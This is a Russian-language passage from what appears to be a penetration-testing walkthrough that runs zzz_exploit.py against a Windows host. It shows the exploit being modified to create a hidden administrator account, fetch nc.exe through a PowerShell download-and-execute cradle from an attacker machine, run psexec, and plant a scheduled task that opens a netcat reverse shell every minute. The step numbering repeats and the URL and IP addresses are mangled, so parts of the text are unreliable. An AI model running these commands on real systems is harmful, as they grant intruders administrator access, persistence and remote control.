Вместо того чтобы загружать обратную оболочку и генерировать алерты по пути, мы можем просто создать нового администратора на целевой машине. Таким образом, у нас будут рабочие учетные данные администратора на машине, и мы сможем подключиться к ней с помощью RDP или psexec. Давайте посмотрим.

service_exec(conn, r"cmd /c net user attacker hello123 /add")
service_exec(conn, r"cmd /c net localgroup administrators attacker /add")

python2.7 zzz_exploit.py 192.168.0.82 ntsvcs

После создания пользователя и добавления в группу локальных администраторов нам необходимо стянуть на атакуемый хост nc, поэтому в очередной раз модифицируем эксплоит

service_exec(conn, r"cmd /c powershell iex(new-object net.webclient).downloadstring('[<http://192.168.0.143/>](<http://10.0.2.4/test.ps1>)nc.exe')")

7. Подготовим web-сервер для передачи payload и запустим handler:

$ python3 -m http.server

8. Примерим эксплойт к машине:

$ python2.7 zzz_exploit.py 192.168.0.82 ntsvcs

Давайте выполним psexec c использованием закриптованного файла psexec.exe

python psexec.py <attacker:[email protected]> -debug -file ./psexec.exe

7. Оставляем закладку для закрепления:

schtasks /create /sc minute /mo 1 /tr “c:\\nc.exe 198.168.0.143 9898 -e cmd.exe”

И поднимаем слушатель на порту 9898

nc -nvlp 9898

Получаем обратную оболочку для дальнейшей работы